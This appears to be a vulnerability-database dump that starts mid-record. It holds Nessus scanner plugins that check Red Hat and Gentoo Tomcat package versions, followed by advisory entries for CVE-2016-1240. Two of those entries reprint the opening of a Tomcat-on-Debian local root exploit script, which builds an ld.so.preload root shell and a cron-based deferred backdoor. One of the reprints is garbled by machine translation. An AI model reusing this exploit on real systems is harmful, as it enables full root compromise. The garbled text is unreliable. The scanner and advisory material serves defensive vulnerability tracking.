value:\"p-cpe:/a:redhat:enterprise_linux:hibernate4-core-eap6\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:redhat:enterprise_linux:hibernate4-eap6\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:redhat:enterprise_linux:hibernate4-entitymanager-eap6\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:redhat:enterprise_linux:hibernate4-envers-eap6\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:redhat:enterprise_linux:jbcs-httpd24-apache-commons-daemon\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:redhat:enterprise_linux:jbcs-httpd24-apache-commons-daemon-jsvc\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:redhat:enterprise_linux:jbcs-httpd24-apache-commons-daemon-jsvc-debuginfo\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:redhat:enterprise_linux:jbcs-httpd24-runtime\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:redhat:enterprise_linux:mod_cluster\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:redhat:enterprise_linux:mod_cluster-tomcat7\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:redhat:enterprise_linux:mod_cluster-tomcat8\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:redhat:enterprise_linux:tomcat-native\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:redhat:enterprise_linux:tomcat-native-debuginfo\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:redhat:enterprise_linux:tomcat-vault\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:redhat:enterprise_linux:tomcat7\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:redhat:enterprise_linux:tomcat7-admin-webapps\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:redhat:enterprise_linux:tomcat7-docs-webapp\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:redhat:enterprise_linux:tomcat7-el-2.2-api\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:redhat:enterprise_linux:tomcat7-javadoc\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:redhat:enterprise_linux:tomcat7-jsp-2.2-api\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:redhat:enterprise_linux:tomcat7-jsvc\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:redhat:enterprise_linux:tomcat7-lib\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:redhat:enterprise_linux:tomcat7-log4j\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:redhat:enterprise_linux:tomcat7-selinux\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:redhat:enterprise_linux:tomcat7-servlet-3.0-api\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:redhat:enterprise_linux:tomcat7-webapps\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:redhat:enterprise_linux:tomcat8\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:redhat:enterprise_linux:tomcat8-admin-webapps\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:redhat:enterprise_linux:tomcat8-docs-webapp\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:redhat:enterprise_linux:tomcat8-el-2.2-api\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:redhat:enterprise_linux:tomcat8-javadoc\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:redhat:enterprise_linux:tomcat8-jsp-2.3-api\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:redhat:enterprise_linux:tomcat8-jsvc\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:redhat:enterprise_linux:tomcat8-lib\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:redhat:enterprise_linux:tomcat8-log4j\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:redhat:enterprise_linux:tomcat8-selinux\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:redhat:enterprise_linux:tomcat8-servlet-3.1-api\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:redhat:enterprise_linux:tomcat8-webapps\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:redhat:enterprise_linux:6\");\n\n script_set_attribute(attribute:\"vuln_publication_date\", value:\"2016/07/04\");\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2017/03/07\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2017/03/08\");\n script_set_attribute(attribute:\"generated_plugin\", value:\"current\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_copyright(english:\"This script is Copyright (C) 2017-2019 and is owned by Tenable, Inc. or an Affiliate thereof.\");\n script_family(english:\"Red Hat Local Security Checks\");\n\n script_dependencies(\"ssh_get_info.nasl\");\n script_require_keys(\"Host/local_checks_enabled\", \"Host/RedHat/release\", \"Host/RedHat/rpm-list\", \"Host/cpu\");\n\n exit(0);\n}\n\n\ninclude(\"audit.inc\");\ninclude(\"global_settings.inc\");\ninclude(\"misc_func.inc\");\ninclude(\"rpm.inc\");\n\nif (!get_kb_item(\"Host/local_checks_enabled\")) audit(AUDIT_LOCAL_CHECKS_NOT_ENABLED);\nrelease = get_kb_item(\"Host/RedHat/release\");\nif (isnull(release) || \"Red Hat\" >!< release) audit(AUDIT_OS_NOT, \"Red Hat\");\nos_ver = pregmatch(pattern: \"Red Hat Enterprise Linux.*release ([0-9]+(\\.[0-9]+)?)\", string:release);\nif (isnull(os_ver)) audit(AUDIT_UNKNOWN_APP_VER, \"Red Hat\");\nos_ver = os_ver[1];\nif (! preg(pattern:\"^6([^0-9]|$)\", string:os_ver)) audit(AUDIT_OS_NOT, \"Red Hat 6.x\", \"Red Hat \" + os_ver);\n\nif (!get_kb_item(\"Host/RedHat/rpm-list\")) audit(AUDIT_PACKAGE_LIST_MISSING);\n\ncpu = get_kb_item(\"Host/cpu\");\nif (isnull(cpu)) audit(AUDIT_UNKNOWN_ARCH);\nif (\"x86_64\" >!< cpu && cpu !~ \"^i[3-6]86$\" && \"s390\" >!< cpu) audit(AUDIT_LOCAL_CHECKS_NOT_IMPLEMENTED, \"Red Hat\", cpu);\n\nyum_updateinfo = get_kb_item(\"Host/RedHat/yum-updateinfo\");\nif (!empty_or_null(yum_updateinfo)) \n{\n rhsa = \"RHSA-2017:0455\";\n yum_report = redhat_generate_yum_updateinfo_report(rhsa:rhsa);\n if (!empty_or_null(yum_report))\n {\n security_report_v4(\n port : 0,\n severity : SECURITY_HOLE,\n extra : yum_report \n );\n exit(0);\n }\n else\n {\n audit_message = \"affected by Red Hat security advisory \" + rhsa;\n audit(AUDIT_OS_NOT, audit_message);\n }\n}\nelse\n{\n flag = 0;\n if (rpm_check(release:\"RHEL6\", reference:\"hibernate4-c3p0-eap6-4.2.23-1.Final_redhat_1.1.ep6.el6\")) flag++;\n if (rpm_check(release:\"RHEL6\", reference:\"hibernate4-core-eap6-4.2.23-1.Final_redhat_1.1.ep6.el6\")) flag++;\n if (rpm_check(release:\"RHEL6\", reference:\"hibernate4-eap6-4.2.23-1.Final_redhat_1.1.ep6.el6\")) flag++;\n if (rpm_check(release:\"RHEL6\", reference:\"hibernate4-entitymanager-eap6-4.2.23-1.Final_redhat_1.1.ep6.el6\")) flag++;\n if (rpm_check(release:\"RHEL6\", reference:\"hibernate4-envers-eap6-4.2.23-1.Final_redhat_1.1.ep6.el6\")) flag++;\n if (rpm_check(release:\"RHEL6\", reference:\"jbcs-httpd24-apache-commons-daemon-1.0.15-1.redhat_2.1.jbcs.el6\")) flag++;\n if (rpm_check(release:\"RHEL6\", cpu:\"i686\", reference:\"jbcs-httpd24-apache-commons-daemon-jsvc-1.0.15-17.redhat_2.jbcs.el6\")) flag++;\n if (rpm_check(release:\"RHEL6\", cpu:\"x86_64\", reference:\"jbcs-httpd24-apache-commons-daemon-jsvc-1.0.15-17.redhat_2.jbcs.el6\")) flag++;\n if (rpm_check(release:\"RHEL6\", cpu:\"i686\", reference:\"jbcs-httpd24-apache-commons-daemon-jsvc-debuginfo-1.0.15-17.redhat_2.jbcs.el6\")) flag++;\n if (rpm_check(release:\"RHEL6\", cpu:\"x86_64\", reference:\"jbcs-httpd24-apache-commons-daemon-jsvc-debuginfo-1.0.15-17.redhat_2.jbcs.el6\")) flag++;\n if (rpm_check(release:\"RHEL6\", reference:\"jbcs-httpd24-runtime-1-3.jbcs.el6\")) flag++;\n if (rpm_check(release:\"RHEL6\", reference:\"mod_cluster-1.3.5-2.Final_redhat_2.1.ep7.el6\")) flag++;\n if (rpm_check(release:\"RHEL6\", reference:\"mod_cluster-tomcat7-1.3.5-2.Final_redhat_2.1.ep7.el6\")) flag++;\n if (rpm_check(release:\"RHEL6\", reference:\"mod_cluster-tomcat8-1.3.5-2.Final_redhat_2.1.ep7.el6\")) flag++;\n if (rpm_check(release:\"RHEL6\", cpu:\"i686\", reference:\"tomcat-native-1.2.8-9.redhat_9.ep7.el6\")) flag++;\n if (rpm_check(release:\"RHEL6\", cpu:\"x86_64\", reference:\"tomcat-native-1.2.8-9.redhat_9.ep7.el6\")) flag++;\n if (rpm_check(release:\"RHEL6\", cpu:\"i686\", reference:\"tomcat-native-debuginfo-1.2.8-9.redhat_9.ep7.el6\")) flag++;\n if (rpm_check(release:\"RHEL6\", cpu:\"x86_64\", reference:\"tomcat-native-debuginfo-1.2.8-9.redhat_9.ep7.el6\")) flag++;\n if (rpm_check(release:\"RHEL6\", reference:\"tomcat-vault-1.0.8-9.Final_redhat_2.1.ep7.el6\")) flag++;\n if (rpm_check(release:\"RHEL6\", reference:\"tomcat7-7.0.70-16.ep7.el6\")) flag++;\n if (rpm_check(release:\"RHEL6\", reference:\"tomcat7-admin-webapps-7.0.70-16.ep7.el6\")) flag++;\n if (rpm_check(release:\"RHEL6\", reference:\"tomcat7-docs-webapp-7.0.70-16.ep7.el6\")) flag++;\n if (rpm_check(release:\"RHEL6\", reference:\"tomcat7-el-2.2-api-7.0.70-16.ep7.el6\")) flag++;\n if (rpm_check(release:\"RHEL6\", reference:\"tomcat7-javadoc-7.0.70-16.ep7.el6\")) flag++;\n if (rpm_check(release:\"RHEL6\", reference:\"tomcat7-jsp-2.2-api-7.0.70-16.ep7.el6\")) flag++;\n if (rpm_check(release:\"RHEL6\", reference:\"tomcat7-jsvc-7.0.70-16.ep7.el6\")) flag++;\n if (rpm_check(release:\"RHEL6\", reference:\"tomcat7-lib-7.0.70-16.ep7.el6\")) flag++;\n if (rpm_check(release:\"RHEL6\", reference:\"tomcat7-log4j-7.0.70-16.ep7.el6\")) flag++;\n if (rpm_check(release:\"RHEL6\", reference:\"tomcat7-selinux-7.0.70-16.ep7.el6\")) flag++;\n if (rpm_check(release:\"RHEL6\", reference:\"tomcat7-servlet-3.0-api-7.0.70-16.ep7.el6\")) flag++;\n if (rpm_check(release:\"RHEL6\", reference:\"tomcat7-webapps-7.0.70-16.ep7.el6\")) flag++;\n if (rpm_check(release:\"RHEL6\", reference:\"tomcat8-8.0.36-17.ep7.el6\")) flag++;\n if (rpm_check(release:\"RHEL6\", reference:\"tomcat8-admin-webapps-8.0.36-17.ep7.el6\")) flag++;\n if (rpm_check(release:\"RHEL6\", reference:\"tomcat8-docs-webapp-8.0.36-17.ep7.el6\")) flag++;\n if (rpm_check(release:\"RHEL6\", reference:\"tomcat8-el-2.2-api-8.0.36-17.ep7.el6\")) flag++;\n if (rpm_check(release:\"RHEL6\", reference:\"tomcat8-javadoc-8.0.36-17.ep7.el6\")) flag++;\n if (rpm_check(release:\"RHEL6\", reference:\"tomcat8-jsp-2.3-api-8.0.36-17.ep7.el6\")) flag++;\n if (rpm_check(release:\"RHEL6\", reference:\"tomcat8-jsvc-8.0.36-17.ep7.el6\")) flag++;\n if (rpm_check(release:\"RHEL6\", reference:\"tomcat8-lib-8.0.36-17.ep7.el6\")) flag++;\n if (rpm_check(release:\"RHEL6\", reference:\"tomcat8-log4j-8.0.36-17.ep7.el6\")) flag++;\n if (rpm_check(release:\"RHEL6\", reference:\"tomcat8-selinux-8.0.36-17.ep7.el6\")) flag++;\n if (rpm_check(release:\"RHEL6\", reference:\"tomcat8-servlet-3.1-api-8.0.36-17.ep7.el6\")) flag++;\n if (rpm_check(release:\"RHEL6\", reference:\"tomcat8-webapps-8.0.36-17.ep7.el6\")) flag++;\n\n if (flag)\n {\n security_report_v4(\n port : 0,\n severity : SECURITY_HOLE,\n extra : rpm_report_get() + redhat_report_package_caveat()\n );\n exit(0);\n }\n else\n {\n tested = pkg_tests_get();\n if (tested) audit(AUDIT_PACKAGE_NOT_AFFECTED, tested);\n else audit(AUDIT_PACKAGE_NOT_INSTALLED, \"hibernate4-c3p0-eap6 / hibernate4-core-eap6 / hibernate4-eap6 / etc\");\n }\n}\n", "cvss": {"score": 10.0, "vector": "AV:N/AC:L/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2019-11-01T02:40:54", "bulletinFamily": "scanner", "description": "The remote host is affected by the vulnerability described in GLSA-201705-09\n(Apache Tomcat: Multiple vulnerabilities)\n\n Multiple vulnerabilities have been discovered in Tomcat. Please review\n the CVE identifiers referenced below for details.\n \nImpact :\n\n A remote attacker may be able to cause a Denial of Service condition,\n obtain sensitive information, bypass protection mechanisms and\n authentication restrictions.\n A local attacker, who is a tomcat’s system user or belongs to\n tomcat’s group, could potentially escalate privileges.\n \nWorkaround :\n\n There is no known workaround at this time.", "modified": "2019-11-02T00:00:00", "id": "GENTOO_GLSA-201705-09.NASL", "href": "https://www.tenable.com/plugins/nessus/100262", "published": "2017-05-18T00:00:00", "title": "GLSA-201705-09 : Apache Tomcat: Multiple vulnerabilities", "type": "nessus", "sourceData": "#\n# (C) Tenable Network Security, Inc.\n#\n# The descriptive text and package checks in this plugin were\n# extracted from Gentoo Linux Security Advisory GLSA 201705-09.\n#\n# The advisory text is Copyright (C) 2001-2018 Gentoo Foundation, Inc.\n# and licensed under the Creative Commons - Attribution / Share Alike \n# license. See http://creativecommons.org/licenses/by-sa/3.0/\n#\n\ninclude(\"compat.inc\");\n\nif (description)\n{\n script_id(100262);\n script_version(\"3.7\");\n script_cvs_date(\"Date: 2019/04/10 16:10:17\");\n\n script_cve_id(\"CVE-2015-5174\", \"CVE-2015-5345\", \"CVE-2015-5346\", \"CVE-2015-5351\", \"CVE-2016-0706\", \"CVE-2016-0714\", \"CVE-2016-0763\", \"CVE-2016-1240\", \"CVE-2016-3092\", \"CVE-2016-8745\", \"CVE-2017-5647\", \"CVE-2017-5648\", \"CVE-2017-5650\", \"CVE-2017-5651\");\n script_xref(name:\"GLSA\", value:\"201705-09\");\n\n script_name(english:\"GLSA-201705-09 : Apache Tomcat: Multiple vulnerabilities\");\n script_summary(english:\"Checks for updated package(s) in /var/db/pkg\");\n\n script_set_attribute(\n attribute:\"synopsis\", \n value:\n\"The remote Gentoo host is missing one or more security-related\npatches.\"\n );\n script_set_attribute(\n attribute:\"description\", \n value:\n\"The remote host is affected by the vulnerability described in GLSA-201705-09\n(Apache Tomcat: Multiple vulnerabilities)\n\n Multiple vulnerabilities have been discovered in Tomcat. Please review\n the CVE identifiers referenced below for details.\n \nImpact :\n\n A remote attacker may be able to cause a Denial of Service condition,\n obtain sensitive information, bypass protection mechanisms and\n authentication restrictions.\n A local attacker, who is a tomcat’s system user or belongs to\n tomcat’s group, could potentially escalate privileges.\n \nWorkaround :\n\n There is no known workaround at this time.\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://security.gentoo.org/glsa/201705-09\"\n );\n script_set_attribute(\n attribute:\"solution\", \n value:\n\"All Apache Tomcat users have to manually check their Tomcat runscripts\n to make sure that they don’t use an old, vulnerable runscript. In\n addition:\n All Apache Tomcat 7 users should upgrade to the latest version:\n # emerge --sync\n # emerge --ask --oneshot --verbose '>=www-servers/tomcat-7.0.70:7'\n All Apache Tomcat 8 users should upgrade to the latest version:\n # emerge --sync\n # emerge --ask --oneshot --verbose '>=www-servers/tomcat-8.0.36:8'\"\n );\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:L/Au:N/C:N/I:N/A:C\");\n script_set_cvss_temporal_vector(\"CVSS2#E:POC/RL:OF/RC:C\");\n script_set_cvss3_base_vector(\"CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H\");\n script_set_cvss3_temporal_vector(\"CVSS:3.0/E:P/RL:O/RC:C\");\n script_set_attribute(attribute:\"exploitability_ease\", value:\"Exploits are available\");\n script_set_attribute(attribute:\"exploit_available\", value:\"true\");\n\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:gentoo:linux:tomcat\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:gentoo:linux\");\n\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2017/05/18\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2017/05/18\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_copyright(english:\"This script is Copyright (C) 2017-2019 and is owned by Tenable, Inc. or an Affiliate thereof.\");\n script_family(english:\"Gentoo Local Security Checks\");\n\n script_dependencies(\"ssh_get_info.nasl\");\n script_require_keys(\"Host/local_checks_enabled\", \"Host/Gentoo/release\", \"Host/Gentoo/qpkg-list\");\n\n exit(0);\n}\n\n\ninclude(\"audit.inc\");\ninclude(\"global_settings.inc\");\ninclude(\"qpkg.inc\");\n\nif (!get_kb_item(\"Host/local_checks_enabled\")) audit(AUDIT_LOCAL_CHECKS_NOT_ENABLED);\nif (!get_kb_item(\"Host/Gentoo/release\")) audit(AUDIT_OS_NOT, \"Gentoo\");\nif (!get_kb_item(\"Host/Gentoo/qpkg-list\")) audit(AUDIT_PACKAGE_LIST_MISSING);\n\n\nflag = 0;\n\nif (qpkg_check(package:\"www-servers/tomcat\", unaffected:make_list(\"ge 8.0.36\", \"ge 7.0.70\"), vulnerable:make_list(\"lt 8.0.36\"))) flag++;\n\nif (flag)\n{\n if (report_verbosity > 0) security_hole(port:0, extra:qpkg_report_get());\n else security_hole(0);\n exit(0);\n}\nelse\n{\n tested = qpkg_tests_get();\n if (tested) audit(AUDIT_PACKAGE_NOT_AFFECTED, tested);\n else audit(AUDIT_PACKAGE_NOT_INSTALLED, \"Apache Tomcat\");\n}\n", "cvss": {"score": 7.8, "vector": "AV:N/AC:L/Au:N/C:N/I:N/A:C"}}], "myhack58": [{"lastseen": "2016-10-29T18:03:04", "bulletinFamily": "info", "description": "Will you celebrate the National Day, the Tomcat to 1 0 September 1, exposed the local to mention the right Vulnerability, CVE-2 0 1 6-1 2 4 0 to. Just a Tomcat user with low privileges, the attacker could use the vulnerability to get to the system ROOT privileges. And the vulnerability of the use the difficulty is not large, the affected users need special attention. \nTomcat is running in Apache on the application server, support for running Servlet/JSP application container--can be the Tomcat as an Apache extension, in fact, Tomcat can also be independent of Apache running. \n! [](/Article/UploadPic/2016-10/2 0 1 6 1 0 8 1 6 4 2 1 3 2 3 0. png? www. myhack58. com) \nVulnerability ID: \nCVE-2 0 1 6-1 2 4 0 \nAffect range: \nTomcat 8 \nTomcat 7 \nTomcat 6 \nAffected systems include Debian, Ubuntu, other use the corresponding deb package system may also be affected. \nRepair solutions: \nThe Debian security team has fixed the affected packages; the update to the system to provide the latest version of the Tomcat package to. \nVulnerability overview: \nDebian system on Linux administrators typically use apt-get for package management, the CVE-2 0 1 6-1 2 4 0 This is a vulnerability which is the problem in Tomcat deb package,make the deb package to install Tomcat program automatically as administrator to install a startup script:/etc/init. d/tocat* use the script, can lead to an attacker through a low-permissions of the Tomcat user to get system root permission! \n# Run the catalina.sh script as a daemon \nset +e \ntouch \"$CATALINA_PID\" \"$CATALINA_BASE\"/logs/catalina. out \nchown $TOMCAT7_USER \"$CATALINA_PID\" \"$CATALINA_BASE\"/logs/catalina. out \nA local attacker, as the tomcat user, for example, through web application vulnerabilities to the catalina. out modified to point to any file system links, once the Tomcat init script with ROOT permissions running in the service after the restart again open the catalina. out file, the attacker can obtain ROOT privileges. \nVulnerability PoC of: \n#!/ bin/bash \n# \n# Tomcat 6/7/8 on Debian-based distros - Local Root Privilege Escalation Exploit \n# \n# CVE-2 0 1 6-1 2 4 0 \n# \n# Discovered and coded by: \n# \n# Dawid Golunski \n# http://legalhackers.com \n# \n# This exploit targets the Tomcat (versions 6, 7 and 8) packaging on \n# Debian-based distros including Debian, Ubuntu etc. \n# It allows attackers with a tomcat shell (e.g. obtained remotely through a \n# vulnerable java webapp, or locally via weak permissions on webapps in the \n# Tomcat webroot directories etc.) to escalate their privileges to root. \n# \n# Usage: \n# ./ tomcat-rootprivesc-deb.sh path_to_catalina. out [-deferred] \n# \n# The exploit can used in two ways: \n# \n# -active (assumed by default) - which waits for a Tomcat restart in a loop and instantly \n# gains/executes a rootshell via ld. so. preload as soon as the Tomcat service is restarted. \n# It also gives attacker a chance to execute: kill [tomcat-pid] command to force/speed up \n# a Tomcat restart (done manually by an admin, or potentially by some tomcat service watchdog etc.) \n# \n# -deferred (the requires the-deferred switch on argv[2]) - this mode symlinks the logfile to \n# /etc/default/locale and exits. It removes the need for the Trojan to run in a loop waiting. \n# Attackers can come back at a later time and check on the /etc/default/locale file. Upon a \n# Tomcat restart / server reboot, the file should be owned by tomcat user. The attackers can \n# then add arbitrary commands to the file which will be executed with root privileges by \n# the /etc/cron. daily/tomcatN logrotation cronjob (run daily around 6:25am on default \n# Ubuntu/Debian Tomcat installations). \n# \n# See full advisory for details at: \n# http://legalhackers.com/advisories/Tomcat-DebPkgs-Root-Privilege-Escalation-Exploit-CVE-2016-1240.html \n# \n# Disclaimer: \n# For testing purposes only. Do no harm. \n# \nBACKDOORSH=\"/bin/bash\" \nBACKDOORPATH=\"/tmp/tomcatrootsh\" \nPRIVESCLIB=\"/tmp/privesclib. so\" \nPRIVESCSRC=\"/tmp/privesclib. c\" \nSUIDBIN=\"/usr/bin/sudo\" \nfunction cleanexit { \n# Cleanup \necho-e \"\\n[+] Cleaning up...\" \nrm-f $PRIVESCSRC \nrm-f $PRIVESCLIB \nrm-f $TOMCATLOG \ntouch $TOMCATLOG \nif [ -f /etc/ld. so. preload ]; then \necho-n > /etc/ld. so. preload 2>/dev/null \nfi \necho-e \"\\n[+] Job done. Exiting with code $1 \\n\" \nexit $1 \n} \nfunction ctrl_c() { \necho-e \"\\n[+] Active exploitation aborted. Remember you can use-deferred switch for deferred exploitation.\" \ncleanexit 0 \n} \n#intro \necho-e \"\\0 3 3[94m \\nTomcat 6/7/8 on Debian-based distros - Local Root Privilege Escalation Exploit\\nCVE-2 0 1 6-1 2 4 0\\n\" \necho-e \"Discovered and coded by: \\n\\nDawid Golunski \\nhttp://legalhackers. com \\0 3 3[0m\" \n# Args \nif [ $# -lt 1 ]; then \necho-e \"\\n[!] Exploit usage: \\n\\n$0 path_to_catalina. out [-deferred]\\n\" \nexit 3 \nfi \nif [ \"$2\" = \"-deferred\" ]; then \nmode=\"deferred\" \n\n\n**[1] [[2]](<79941_2.htm>) [[3]](<79941_3.htm>) [next](<79941_2.htm>)**\n", "modified": "2016-10-08T00:00:00", "published": "2016-10-08T00:00:00", "href": "http://www.myhack58.com/Article/html/3/62/2016/79941.htm", "id": "MYHACK58:62201679941", "type": "myhack58", "title": "Vulnerability warning: Tomcat aeration local mention the right Vulnerability, CVE-2 0 1 6-1 2 4 0 reference PoC-the exploit-warning-the black bar safety net", "cvss": {"score": 7.2, "vector": "AV:LOCAL/AC:LOW/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}}], "zdt": [{"lastseen": "2018-01-09T13:30:40", "bulletinFamily": "exploit", "description": "Exploit for linux platform in category local exploits", "modified": "2016-10-01T00:00:00", "published": "2016-10-01T00:00:00", "id": "1337DAY-ID-25101", "href": "https://0day.today/exploit/description/25101", "type": "zdt", "title": "Apache Tomcat on Debian-Based Distros - Privilege Escalation Vulnerability", "sourceData": "=============================================\r\n- Discovered by: Dawid Golunski\r\n- http://legalhackers.com\r\n- dawid (at) legalhackers.com\r\n\r\n- CVE-2016-1240\r\n- Release date: 30.09.2016\r\n- Revision: 1\r\n- Severity: High\r\n=============================================\r\n\r\n\r\nI. VULNERABILITY\r\n-------------------------\r\n\r\nTomcat packaging on Debian-based distros - Local Root Privilege Escalation\r\n\r\nAffected debian packages:\r\n\r\nTomcat 8 <= 8.0.36-2\r\nTomcat 7 <= 7.0.70-2\r\nTomcat 6 <= 6.0.45+dfsg-1~deb8u1\r\n\r\nUbuntu systems are also affected. See section VII. for details.\r\nOther systems using the affected debian packages may also be affected.\r\n\r\n\r\nII. BACKGROUND\r\n-------------------------\r\n\r\n\"The Apache Tomcat\u00ae software is an open source implementation of the\r\nJava Servlet, JavaServer Pages, Java Expression Language and Java WebSocket\r\ntechnologies. The Java Servlet, JavaServer Pages, Java Expression Language\r\nand Java WebSocket specifications are developed under the Java Community\r\nProcess.\r\n\r\nThe Apache Tomcat software is developed in an open and participatory\r\nenvironment and released under the Apache License version 2.\r\nThe Apache Tomcat project is intended to be a collaboration of the\r\nbest-of-breed developers from around the world.\r\n\r\nApache Tomcat software powers numerous large-scale, mission-critical web\r\napplications across a diverse range of industries and organizations.\r\nSome of these users and their stories are listed on the PoweredBy wiki page.\r\n\"\r\n\r\nhttp://tomcat.apache.org/\r\n\r\n\r\nIII. INTRODUCTION\r\n-------------------------\r\n\r\nTomcat (6, 7, 8) packages provided by default repositories on Debian-based\r\ndistributions (including Debian, Ubuntu etc.) provide a vulnerable\r\ntomcat init script that allows local attackers who have already gained access\r\nto the tomcat account (for example, by exploiting an RCE vulnerability\r\nin a java web application hosted on Tomcat, uploading a webshell etc.) to\r\nescalate their privileges from tomcat user to root and fully compromise the\r\ntarget system.\r\n\r\nIV. DESCRIPTION\r\n-------------------------\r\n\r\nThe vulnerability is located in the tomcat init script provided by affected\r\npackages, normally installed at /etc/init.d/tomcatN.\r\n\r\nThe script for tomcat7 contains the following lines:\r\n\r\n-----[tomcat7]----\r\n\r\n# Run the catalina.sh script as a daemon\r\nset +e\r\ntouch \"$CATALINA_PID\" \"$CATALINA_BASE\"/logs/catalina.out\r\nchown $TOMCAT7_USER \"$CATALINA_PID\" \"$CATALINA_BASE\"/logs/catalina.out\r\n\r\n-------[eof]------\r\n\r\nLocal attackers who have gained access to the server in the context of the\r\ntomcat user (for example, through a vulnerability in a web application) would\r\nbe able to replace the log file with a symlink to an arbitrary system file\r\nand escalate their privileges to root once Tomcat init script (running as root)\r\nre-opens the catalina.out file after a service restart, reboot etc.\r\n\r\nAs attackers would already have a tomcat account at the time of exploitation,\r\nthey could also kill the tomcat processes to introduce the need for a restart.\r\n\r\n\r\nV. PROOF OF CONCEPT EXPLOIT\r\n-------------------------\r\n\r\n------[ tomcat-rootprivesc-deb.sh ]------\r\n\r\n#!/bin/bash\r\n#\r\n# Tomcat 6/7/8 on Debian-based distros - Local Root Privilege Escalation Exploit\r\n#\r\n# CVE-2016-1240\r\n#\r\n# Discovered and coded by:\r\n#\r\n# Dawid Golunski\r\n# http://legalhackers.com\r\n#\r\n# This exploit targets Tomcat (versions 6, 7 and 8) packaging on\r\n# Debian-based distros including Debian, Ubuntu etc.\r\n# It allows attackers with a tomcat shell (e.g. obtained remotely through a\r\n# vulnerable java webapp, or locally via weak permissions on webapps in the\r\n# Tomcat webroot directories etc.) to escalate their privileges to root.\r\n#\r\n# Usage:\r\n# ./tomcat-rootprivesc-deb.sh path_to_catalina.out [-deferred]\r\n#\r\n# The exploit can used in two ways:\r\n#\r\n# -active (assumed by default) - which waits for a Tomcat restart in a loop and instantly\r\n# gains/executes a rootshell via ld.so.preload as soon as Tomcat service is restarted.\r\n# It also gives attacker a chance to execute: kill [tomcat-pid] command to force/speed up\r\n# a Tomcat restart (done manually by an admin, or potentially by some tomcat service watchdog etc.)\r\n#\r\n# -deferred (requires the -deferred switch on argv[2]) - this mode symlinks the logfile to\r\n# /etc/default/locale and exits. It removes the need for the exploit to run in a loop waiting.\r\n# Attackers can come back at a later time and check on the /etc/default/locale file. Upon a\r\n# Tomcat restart / server reboot, the file should be owned by tomcat user. The attackers can\r\n# then add arbitrary commands to the file which will be executed with root privileges by\r\n# the /etc/cron.daily/tomcatN logrotation cronjob (run daily around 6:25am on default\r\n# Ubuntu/Debian Tomcat installations).\r\n#\r\n# See full advisory for details at:\r\n# http://legalhackers.com/advisories/Tomcat-DebPkgs-Root-Privilege-Escalation-Exploit-CVE-2016-1240.html\r\n#\r\n# Disclaimer:\r\n# For testing purposes only. Do no harm.\r\n#\r\n\r\nBACKDOORSH=\"/bin/bash\"\r\nBACKDOORPATH=\"/tmp/tomcatrootsh\"\r\nPRIVESCLIB=\"/tmp/privesclib.so\"\r\nPRIVESCSRC=\"/tmp/privesclib.c\"\r\nSUIDBIN=\"/usr/bin/sudo\"\r\n\r\nfunction cleanexit {\r\n# Cleanup\r\necho -e \"\\n[+] Cleaning up...\"\r\nrm -f $PRIVESCSRC\r\nrm -f $PRIVESCLIB\r\nrm -f $TOMCATLOG\r\ntouch $TOMCATLOG\r\nif [ -f /etc/ld.so.preload ]; then\r\necho -n > /etc/ld.so.preload 2>/dev/null\r\nfi\r\necho -e \"\\n[+] Job done. Exiting with code $1 \\n\"\r\nexit $1\r\n}\r\n\r\nfunction ctrl_c() {\r\necho -e \"\\n[+] Active exploitation aborted. Remember you can use -deferred switch for deferred 